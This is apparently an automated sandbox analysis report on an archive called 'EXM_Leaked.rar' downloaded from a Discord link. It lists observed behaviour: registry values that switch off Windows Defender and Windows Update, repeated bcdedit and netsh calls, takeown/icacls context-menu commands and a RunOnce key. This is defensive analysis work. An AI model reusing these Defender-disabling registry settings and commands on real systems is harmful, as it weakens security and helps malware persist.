Analysis
max time kernel
273s
max time network
280s
platform
windows10-2004_x64
resource
win10v2004-20240226-en
resource tags
arch:x64 arch:x86 image:win10v2004-20240226-en locale:en-us os:windows10-2004-x64 system
submitted
02/03/2024, 23:03
Static task
static1
URLScan task
urlscan1
Behavioral task
behavioral1
Sample
https://cdn.discordapp.com/attachments/1122175843565842633/1181259340129243156/EXM_Leaked.rar?ex=65ef267d&is=65dcb17d&hm=19bc37788f94fff83e2b28d6138daaf56dfdeead71c7e143547b0cdea4af58d1&
Resource
win10v2004-20240226-en
General
Target
https://cdn.discordapp.com/attachments/1122175843565842633/1181259340129243156/EXM_Leaked.rar?ex=65ef267d&is=65dcb17d&hm=19bc37788f94fff83e2b28d6138daaf56dfdeead71c7e143547b0cdea4af58d1&
Malware Config
Signatures
description ioc Process Key created \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableBehaviorMonitoring = "1" reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableOnAccessProtection = "1" reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableScanOnRealtimeEnable = "1" reg.exe -
Modifies security service 2 TTPs 3 IoCs
description ioc Process Set value (int) \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\WinDefend\Start = "4" reg.exe Set value (int) \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\WinDefend\Start = "4" reg.exe Set value (int) \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\wuauserv\Start = "4" reg.exe -
Modifies visibility of file extensions in Explorer 2 TTPs 1 IoCs
description ioc Process Set value (int) \REGISTRY\USER\S-1-5-21-3808065738-1666277613-1125846146-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\HideFileExt = "0" reg.exe -
Modifies boot configuration data using bcdedit 1 TTPs 64 IoCs
pid Process 3796 bcdedit.exe 5352 bcdedit.exe 5284 bcdedit.exe 5364 bcdedit.exe 5700 bcdedit.exe 2160 bcdedit.exe 5160 bcdedit.exe 4048 bcdedit.exe 5132 bcdedit.exe 5208 bcdedit.exe 3000 bcdedit.exe 4732 bcdedit.exe 3536 bcdedit.exe 4604 bcdedit.exe 4260 bcdedit.exe 5824 bcdedit.exe 5268 bcdedit.exe 5204 bcdedit.exe 2812 bcdedit.exe 4800 bcdedit.exe 4760 bcdedit.exe 2600 bcdedit.exe 2244 bcdedit.exe 5828 bcdedit.exe 5888 bcdedit.exe 5708 bcdedit.exe 5908 bcdedit.exe 5948 bcdedit.exe 5936 bcdedit.exe 5996 bcdedit.exe 5912 bcdedit.exe 5968 bcdedit.exe 5976 bcdedit.exe 6012 bcdedit.exe 6040 bcdedit.exe 1948 bcdedit.exe 4748 bcdedit.exe 5812 bcdedit.exe 6068 bcdedit.exe 4560 bcdedit.exe 3280 bcdedit.exe 6092 bcdedit.exe 3192 bcdedit.exe 3788 bcdedit.exe 4828 bcdedit.exe 1188 bcdedit.exe 456 bcdedit.exe 1604 bcdedit.exe 6116 bcdedit.exe 3700 bcdedit.exe 1104 bcdedit.exe 3732 bcdedit.exe 6124 bcdedit.exe 5136 bcdedit.exe 5172 bcdedit.exe 4416 bcdedit.exe 2460 bcdedit.exe 5292 bcdedit.exe 1240 bcdedit.exe 2428 bcdedit.exe 5408 bcdedit.exe 3260 bcdedit.exe 1760 bcdedit.exe 5396 bcdedit.exe -
Modifies Windows Firewall 2 TTPs 1 IoCs
pid Process 3880 netsh.exe -
Stops running service(s) 3 TTPs
Executes dropped EXE 3 IoCs
pid Process 1736 Exm Ultra Version Leaked.exe 2812 Exm Ultra Version Leaked.exe 5140 bound.exe -
Loads dropped DLL 18 IoCs
pid Process 2812 Exm Ultra Version Leaked.exe 2812 Exm Ultra Version Leaked.exe 2812 Exm Ultra Version Leaked.exe 2812 Exm Ultra Version Leaked.exe 2812 Exm Ultra Version Leaked.exe 2812 Exm Ultra Version Leaked.exe 2812 Exm Ultra Version Leaked.exe 2812 Exm Ultra Version Leaked.exe 2812 Exm Ultra Version Leaked.exe 2812 Exm Ultra Version Leaked.exe 2812 Exm Ultra Version Leaked.exe 2812 Exm Ultra Version Leaked.exe 2812 Exm Ultra Version Leaked.exe 2812 Exm Ultra Version Leaked.exe 2812 Exm Ultra Version Leaked.exe 2812 Exm Ultra Version Leaked.exe 2812 Exm Ultra Version Leaked.exe 2812 Exm Ultra Version Leaked.exe -
Modifies system executable filetype association 2 TTPs 20 IoCs
description ioc Process Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\exefile\shell\runas2\ = "Grant Admin Full Control" reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\exefile\shell\runas2 reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\exefile\shell\runas2 reg.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\exefile\shell\runas2\icon = "C:\\Windows\\system32\\imageres.dll ,73" reg.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\exefile\shell\runas2\command\IsolatedCommand = "cmd.exe /c takeown /f \"%1\" && icacls \"%1\" /grant administrators:F" reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\exefile\shell\runas2 reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\exefile\shell\runas2\command reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\exefile\shell\runas2 reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\exefile\shell\runas2\command reg.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\exefile\shell\runas2\command\IsolatedCommand = "cmd.exe /c takeown /f \"%1\" && icacls \"%1\" /grant administrators:F" reg.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\exefile\shell\runas2\NoWorkingDirectory reg.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\exefile\shell\runas2\command\ = "cmd.exe /c takeown /f \"%1\" && icacls \"%1\" /grant administrators:F" reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\exefile\shell\runas2 reg.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\exefile\shell\runas2\ = "Grant Admin Full Control" reg.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\exefile\shell\runas2\icon = "C:\\Windows\\system32\\imageres.dll ,73" reg.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\exefile\shell\runas2\NoWorkingDirectory reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\exefile\shell\runas2\command reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\exefile\shell\runas2 reg.exe Set value (str) 
\REGISTRY\MACHINE\SOFTWARE\Classes\exefile\shell\runas2\command\ = "cmd.exe /c takeown /f \"%1\" && icacls \"%1\" /grant administrators:F" reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\exefile\shell\runas2\command reg.exe -
Adds Run key to start application 2 TTPs 1 IoCs
description ioc Process Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup0 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP000.TMP\\\"" bound.exe -
Launches sc.exe 3 IoCs
Sc.exe is a Windows utility to control services on the system.
pid Process 5168 sc.exe 5380 sc.exe 1240 sc.exe -
Delays execution with timeout.exe 2 IoCs
pid Process 6060 timeout.exe 6104 timeout.exe -
Enumerates processes with tasklist 1 TTPs 1 IoCs
pid Process 5200 tasklist.exe -
Enumerates system info in registry 2 TTPs 3 IoCs
description ioc Process Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS msedge.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName msedge.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer msedge.exe -
Gathers network information 2 TTPs 4 IoCs
Uses a command-line utility to view the network configuration.
pid Process 5376 ipconfig.exe 5404 ipconfig.exe 5492 ipconfig.exe 4276 ipconfig.exe -
Modifies registry class 64 IoCs
description ioc Process Key created \REGISTRY\USER\S-1-5-21-3808065738-1666277613-1125846146-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe reg.exe Key created \REGISTRY\USER\S-1-5-21-3808065738-1666277613-1125846146-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\*\shell\runas reg.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\*\shell\runas\command\IsolatedCommand = "cmd.exe /c takeown /f \"%1\" && icacls \"%1\" /grant administrators:F" reg.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\*\shell\runas\icon = "C:\\Windows\\system32\\imageres.dll ,73" reg.exe Key created \REGISTRY\USER\S-1-5-21-3808065738-1666277613-1125846146-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage reg.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\*\shell\runas\icon = "C:\\Windows\\system32\\imageres.dll ,73" reg.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\*\shell\runas\command\ = "cmd.exe /c takeown /f \"%1\" && icacls \"%1\" /grant administrators:F" reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\*\shell\runas\command reg.exe Set value (int) \REGISTRY\USER\S-1-5-21-3808065738-1666277613-1125846146-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Main\OptimizeWindowsSearchResultsForScreenReaders = "0" reg.exe Key created \REGISTRY\USER\S-1-5-21-3808065738-1666277613-1125846146-1000_Classes\Local Settings\Software\Microsoft reg.exe Key created \REGISTRY\USER\S-1-5-21-3808065738-1666277613-1125846146-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\exefile\shell\runas2 reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\exefile\shell\runas2 reg.exe Set value 
(str) \REGISTRY\MACHINE\SOFTWARE\Classes\Directory\shell\runas\icon = "C:\\Windows\\system32\\imageres.dll ,73" reg.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Directory\shell\runas\NoWorkingDirectory reg.exe Key created \REGISTRY\USER\S-1-5-21-3808065738-1666277613-1125846146-1000_Classes\Local Settings\Software reg.exe Key created \REGISTRY\USER\S-1-5-21-3808065738-1666277613-1125846146-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion reg.exe Key created \REGISTRY\USER\S-1-5-21-3808065738-1666277613-1125846146-1000_Classes\Local Settings reg.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\*\shell\runas\NoWorkingDirectory reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\*\shell\runas reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Directory\shell\runas reg.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\*\shell\runas\command\IsolatedCommand = "cmd.exe /c takeown /f \"%1\" && icacls \"%1\" /grant administrators:F" reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Directory\shell\runas reg.exe Key created \REGISTRY\USER\S-1-5-21-3808065738-1666277613-1125846146-1000_Classes\Local Settings\Software\Microsoft reg.exe Key created \REGISTRY\USER\S-1-5-21-3808065738-1666277613-1125846146-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge reg.exe Key created \REGISTRY\USER\S-1-5-21-3808065738-1666277613-1125846146-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer reg.exe Key created \REGISTRY\USER\S-1-5-21-3808065738-1666277613-1125846146-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\*\shell\runas\command reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\*\shell\runas reg.exe Key created 
\REGISTRY\MACHINE\SOFTWARE\Classes\Directory\shell\runas\command reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\*\shell\runas\command reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\exefile\shell\runas2 reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\exefile\shell\runas2\command reg.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\exefile\shell\runas2\command\ = "cmd.exe /c takeown /f \"%1\" && icacls \"%1\" /grant administrators:F" reg.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\exefile\shell\runas2\command\IsolatedCommand = "cmd.exe /c takeown /f \"%1\" && icacls \"%1\" /grant administrators:F" reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Directory\shell\runas\command reg.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Directory\shell\runas\command\IsolatedCommand = "cmd.exe /c takeown /f \"%1\" /r /d y && icacls \"%1\" /grant administrators:F /t" reg.exe Key created \REGISTRY\USER\S-1-5-21-3808065738-1666277613-1125846146-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\User\Default\SearchScopes reg.exe Set value (int) \REGISTRY\USER\S-1-5-21-3808065738-1666277613-1125846146-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\User\Default\SearchScopes\ShowSearchSuggestionsGlobal = "0" reg.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\*\shell\runas\command\ = "cmd.exe /c takeown /f \"%1\" && icacls \"%1\" /grant administrators:F" reg.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\exefile\shell\runas2\icon = "C:\\Windows\\system32\\imageres.dll ,73" reg.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\exefile\shell\runas2\command\IsolatedCommand = "cmd.exe /c takeown /f \"%1\" && icacls \"%1\" /grant administrators:F" reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Directory\shell\runas\command 
reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\*\shell\runas reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\*\shell\runas reg.exe Key created \REGISTRY\USER\S-1-5-21-3808065738-1666277613-1125846146-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\PhishingFilter reg.exe Key created \REGISTRY\USER\S-1-5-21-3808065738-1666277613-1125846146-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer reg.exe Set value (int) \REGISTRY\USER\S-1-5-21-3808065738-1666277613-1125846146-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Main\DoNotTrack = "1" reg.exe Key created \REGISTRY\USER\S-1-5-21-3808065738-1666277613-1125846146-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Main reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\*\shell\runas reg.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\exefile\shell\runas2\ = "Grant Admin Full Control" reg.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Directory\shell\runas\ = "Grant Admin Full Control" reg.exe Key created \REGISTRY\USER\S-1-5-21-3808065738-1666277613-1125846146-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\User reg.exe Set value (int) \REGISTRY\USER\S-1-5-21-3808065738-1666277613-1125846146-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Privacy\EnableEncryptedMediaExtensions = "0" reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\exefile\shell\runas2\command reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\exefile\shell\runas2\command reg.exe Key created 
\REGISTRY\MACHINE\Software\Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\Deployment\Package\*\S-1-5-21-3808065738-1666277613-1125846146-1000\{2D8D44F7-5EB9-4D44-9815-5FF6266782D3} msedge.exe Set value (int) \REGISTRY\USER\S-1-5-21-3808065738-1666277613-1125846146-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\PhishingFilter\EnabledV9 = "0" reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\*\shell\runas\command reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\exefile\shell\runas2\command reg.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\exefile\shell\runas2\ = "Grant Admin Full Control" reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Directory\shell\runas reg.exe Key created \REGISTRY\USER\S-1-5-21-3808065738-1666277613-1125846146-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\FlipAhead reg.exe -
Runs net.exe
Suspicious behavior: EnumeratesProcesses 24 IoCs
pid Process 5208 powershell.exe 5208 powershell.exe 5124 powershell.exe 5124 powershell.exe 5424 powershell.exe 5424 powershell.exe 5424 powershell.exe 5124 powershell.exe 5208 powershell.exe 2524 7zFM.exe 2524 7zFM.exe 3704 msedge.exe 3704 msedge.exe 4748 msedge.exe 4748 msedge.exe 5808 powershell.exe 5808 powershell.exe 5808 powershell.exe 4864 powershell.exe 4864 powershell.exe 4864 powershell.exe 1576 powershell.exe 1576 powershell.exe 1576 powershell.exe -
Suspicious behavior: GetForegroundWindowSpam 1 IoCs
pid Process 2524 7zFM.exe -
Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 4 IoCs
pid Process 3704 msedge.exe 3704 msedge.exe 3704 msedge.exe 3704 msedge.exe -
Suspicious use of AdjustPrivilegeToken 64 IoCs
description pid Process Token: SeRestorePrivilege 2524 7zFM.exe Token: 35 2524 7zFM.exe Token: SeSecurityPrivilege 2524 7zFM.exe Token: SeDebugPrivilege 5200 tasklist.exe Token: SeIncreaseQuotaPrivilege 5192 WMIC.exe Token: SeSecurityPrivilege 5192 WMIC.exe Token: SeTakeOwnershipPrivilege 5192 WMIC.exe Token: SeLoadDriverPrivilege 5192 WMIC.exe Token: SeSystemProfilePrivilege 5192 WMIC.exe Token: SeSystemtimePrivilege 5192 WMIC.exe Token: SeProfSingleProcessPrivilege 5192 WMIC.exe Token: SeIncBasePriorityPrivilege 5192 WMIC.exe Token: SeCreatePagefilePrivilege 5192 WMIC.exe Token: SeBackupPrivilege 5192 WMIC.exe Token: SeRestorePrivilege 5192 WMIC.exe Token: SeShutdownPrivilege 5192 WMIC.exe Token: SeDebugPrivilege 5192 WMIC.exe Token: SeSystemEnvironmentPrivilege 5192 WMIC.exe Token: SeRemoteShutdownPrivilege 5192 WMIC.exe Token: SeUndockPrivilege 5192 WMIC.exe Token: SeManageVolumePrivilege 5192 WMIC.exe Token: 33 5192 WMIC.exe Token: 34 5192 WMIC.exe Token: 35 5192 WMIC.exe Token: 36 5192 WMIC.exe Token: SeDebugPrivilege 5124 powershell.exe Token: SeDebugPrivilege 5208 powershell.exe Token: SeDebugPrivilege 5424 powershell.exe Token: SeIncreaseQuotaPrivilege 5192 WMIC.exe Token: SeSecurityPrivilege 5192 WMIC.exe Token: SeTakeOwnershipPrivilege 5192 WMIC.exe Token: SeLoadDriverPrivilege 5192 WMIC.exe Token: SeSystemProfilePrivilege 5192 WMIC.exe Token: SeSystemtimePrivilege 5192 WMIC.exe Token: SeProfSingleProcessPrivilege 5192 WMIC.exe Token: SeIncBasePriorityPrivilege 5192 WMIC.exe Token: SeCreatePagefilePrivilege 5192 WMIC.exe Token: SeBackupPrivilege 5192 WMIC.exe Token: SeRestorePrivilege 5192 WMIC.exe Token: SeShutdownPrivilege 5192 WMIC.exe Token: SeDebugPrivilege 5192 WMIC.exe Token: SeSystemEnvironmentPrivilege 5192 WMIC.exe Token: SeRemoteShutdownPrivilege 5192 WMIC.exe Token: SeUndockPrivilege 5192 WMIC.exe Token: SeManageVolumePrivilege 5192 WMIC.exe Token: 33 5192 WMIC.exe Token: 34 5192 WMIC.exe Token: 35 5192 WMIC.exe Token: 36 5192 WMIC.exe Token: 
SeDebugPrivilege 5808 powershell.exe Token: SeIncreaseQuotaPrivilege 5808 powershell.exe Token: SeSecurityPrivilege 5808 powershell.exe Token: SeTakeOwnershipPrivilege 5808 powershell.exe Token: SeLoadDriverPrivilege 5808 powershell.exe Token: SeSystemProfilePrivilege 5808 powershell.exe Token: SeSystemtimePrivilege 5808 powershell.exe Token: SeProfSingleProcessPrivilege 5808 powershell.exe Token: SeIncBasePriorityPrivilege 5808 powershell.exe Token: SeCreatePagefilePrivilege 5808 powershell.exe Token: SeBackupPrivilege 5808 powershell.exe Token: SeRestorePrivilege 5808 powershell.exe Token: SeShutdownPrivilege 5808 powershell.exe Token: SeDebugPrivilege 5808 powershell.exe Token: SeSystemEnvironmentPrivilege 5808 powershell.exe -
Suspicious use of FindShellTrayWindow 2 IoCs
pid Process 2524 7zFM.exe 2524 7zFM.exe -
Suspicious use of WriteProcessMemory 64 IoCs
description pid Process procid_target PID 3704 wrote to memory of 4928 3704 msedge.exe 119 PID 3704 wrote to memory of 4928 3704 msedge.exe 119 PID 3704 wrote to memory of 1664 3704 msedge.exe 120 PID 3704 wrote to memory of 1664 3704 msedge.exe 120 PID 3704 wrote to memory of 1664 3704 msedge.exe 120 PID 3704 wrote to memory of 1664 3704 msedge.exe 120 PID 3704 wrote to memory of 1664 3704 msedge.exe 120 PID 3704 wrote to memory of 1664 3704 msedge.exe 120 PID 3704 wrote to memory of 1664 3704 msedge.exe 120 PID 3704 wrote to memory of 1664 3704 msedge.exe 120 PID 3704 wrote to memory of 1664 3704 msedge.exe 120 PID 3704 wrote to memory of 1664 3704 msedge.exe 120 PID 3704 wrote to memory of 1664 3704 msedge.exe 120 PID 3704 wrote to memory of 1664 3704 msedge.exe 120 PID 3704 wrote to memory of 1664 3704 msedge.exe 120 PID 3704 wrote to memory of 1664 3704 msedge.exe 120 PID 3704 wrote to memory of 1664 3704 msedge.exe 120 PID 3704 wrote to memory of 1664 3704 msedge.exe 120 PID 3704 wrote to memory of 1664 3704 msedge.exe 120 PID 3704 wrote to memory of 1664 3704 msedge.exe 120 PID 3704 wrote to memory of 1664 3704 msedge.exe 120 PID 3704 wrote to memory of 1664 3704 msedge.exe 120 PID 3704 wrote to memory of 1664 3704 msedge.exe 120 PID 3704 wrote to memory of 1664 3704 msedge.exe 120 PID 3704 wrote to memory of 1664 3704 msedge.exe 120 PID 3704 wrote to memory of 1664 3704 msedge.exe 120 PID 3704 wrote to memory of 1664 3704 msedge.exe 120 PID 3704 wrote to memory of 1664 3704 msedge.exe 120 PID 3704 wrote to memory of 1664 3704 msedge.exe 120 PID 3704 wrote to memory of 1664 3704 msedge.exe 120 PID 3704 wrote to memory of 1664 3704 msedge.exe 120 PID 3704 wrote to memory of 1664 3704 msedge.exe 120 PID 3704 wrote to memory of 1664 3704 msedge.exe 120 PID 3704 wrote to memory of 1664 3704 msedge.exe 120 PID 3704 wrote to memory of 1664 3704 msedge.exe 120 PID 3704 wrote to memory of 1664 3704 msedge.exe 120 PID 3704 wrote to memory of 1664 3704 msedge.exe 120 
PID 3704 wrote to memory of 1664 3704 msedge.exe 120 PID 3704 wrote to memory of 1664 3704 msedge.exe 120 PID 3704 wrote to memory of 1664 3704 msedge.exe 120 PID 3704 wrote to memory of 1664 3704 msedge.exe 120 PID 3704 wrote to memory of 1664 3704 msedge.exe 120 PID 3704 wrote to memory of 1664 3704 msedge.exe 120 PID 3704 wrote to memory of 1664 3704 msedge.exe 120 PID 3704 wrote to memory of 1664 3704 msedge.exe 120 PID 3704 wrote to memory of 1664 3704 msedge.exe 120 PID 3704 wrote to memory of 1664 3704 msedge.exe 120 PID 3704 wrote to memory of 1664 3704 msedge.exe 120 PID 3704 wrote to memory of 1664 3704 msedge.exe 120 PID 3704 wrote to memory of 1664 3704 msedge.exe 120 PID 3704 wrote to memory of 1664 3704 msedge.exe 120 PID 3704 wrote to memory of 1664 3704 msedge.exe 120 PID 3704 wrote to memory of 1664 3704 msedge.exe 120 PID 3704 wrote to memory of 4648 3704 msedge.exe 121 PID 3704 wrote to memory of 4648 3704 msedge.exe 121 PID 3704 wrote to memory of 1088 3704 msedge.exe 122 PID 3704 wrote to memory of 1088 3704 msedge.exe 122 PID 3704 wrote to memory of 1088 3704 msedge.exe 122 PID 3704 wrote to memory of 1088 3704 msedge.exe 122 PID 3704 wrote to memory of 1088 3704 msedge.exe 122 PID 3704 wrote to memory of 1088 3704 msedge.exe 122 PID 3704 wrote to memory of 1088 3704 msedge.exe 122 PID 3704 wrote to memory of 1088 3704 msedge.exe 122 PID 3704 wrote to memory of 1088 3704 msedge.exe 122 -
Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
Processes
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://cdn.discordapp.com/attachments/1122175843565842633/1181259340129243156/EXM_Leaked.rar?ex=65ef267d&is=65dcb17d&hm=19bc37788f94fff83e2b28d6138daaf56dfdeead71c7e143547b0cdea4af58d1&1⤵PID:1576
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --no-appcompat-clear --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=17 --mojo-platform-channel-handle=5700 --field-trial-handle=2248,i,10247514684337323751,15511974759131734137,262144 --variations-seed-version /prefetch:11⤵PID:1436
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --no-appcompat-clear --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=18 --mojo-platform-channel-handle=5744 --field-trial-handle=2248,i,10247514684337323751,15511974759131734137,262144 --variations-seed-version /prefetch:11⤵PID:4180
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-US --service-sandbox-type=asset_store_service --no-appcompat-clear --mojo-platform-channel-handle=4544 --field-trial-handle=2248,i,10247514684337323751,15511974759131734137,262144 --variations-seed-version /prefetch:81⤵PID:3768
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=edge_collections.mojom.CollectionsDataManager --lang=en-US --service-sandbox-type=collections --no-appcompat-clear --mojo-platform-channel-handle=6128 --field-trial-handle=2248,i,10247514684337323751,15511974759131734137,262144 --variations-seed-version /prefetch:81⤵PID:780
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --no-appcompat-clear --disable-gpu-compositing --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=21 --mojo-platform-channel-handle=6256 --field-trial-handle=2248,i,10247514684337323751,15511974759131734137,262144 --variations-seed-version /prefetch:11⤵PID:684
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --no-appcompat-clear --disable-gpu-compositing --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=22 --mojo-platform-channel-handle=5572 --field-trial-handle=2248,i,10247514684337323751,15511974759131734137,262144 --variations-seed-version /prefetch:11⤵PID:2176
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=chrome.mojom.FileUtilService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --mojo-platform-channel-handle=5924 --field-trial-handle=2248,i,10247514684337323751,15511974759131734137,262144 --variations-seed-version /prefetch:81⤵PID:2420
